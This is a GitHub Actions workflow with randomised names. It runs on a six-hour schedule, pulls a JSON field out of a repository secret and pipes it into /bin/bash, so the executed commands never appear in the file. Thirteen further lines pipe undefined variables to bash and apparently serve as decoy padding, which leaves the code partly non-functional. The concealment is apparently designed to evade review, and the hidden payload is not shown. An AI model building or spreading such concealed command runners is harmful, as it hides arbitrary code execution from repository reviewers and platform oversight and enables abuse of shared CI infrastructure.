name: xianghuaguo3451

on:
  workflow_dispatch:
  schedule:
    - cron: '2 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xianghuaguo3451
        env:
          yc5130: ${{ secrets.yc5130 }}
        run: |
          echo $yc5130 | jq -r .ss31 | /bin/bash
          echo $dhq7 | jq -r .jbfkd8738 | /bin/bash
          echo $tdabn9884 | jq -r .eznnz7 | /bin/bash
          echo $p430 | jq -r .ivrjb98119 | /bin/bash
          echo $x21 | jq -r .f491 | /bin/bash
          echo $pjeyh330 | jq -r .y28330 | /bin/bash
          echo $ibn5965 | jq -r .emph432 | /bin/bash
          echo $aq457 | jq -r .rkjgg90159 | /bin/bash
          echo $nhjf12 | jq -r .ehhmq28345 | /bin/bash
          echo $zve32465 | jq -r .tnj2 | /bin/bash
          echo $ckf76 | jq -r .au8719 | /bin/bash
          echo $l10208 | jq -r .tt11413 | /bin/bash
          echo $f183 | jq -r .m96 | /bin/bash
          echo $lgh1 | jq -r .ybvsh044 | /bin/bash

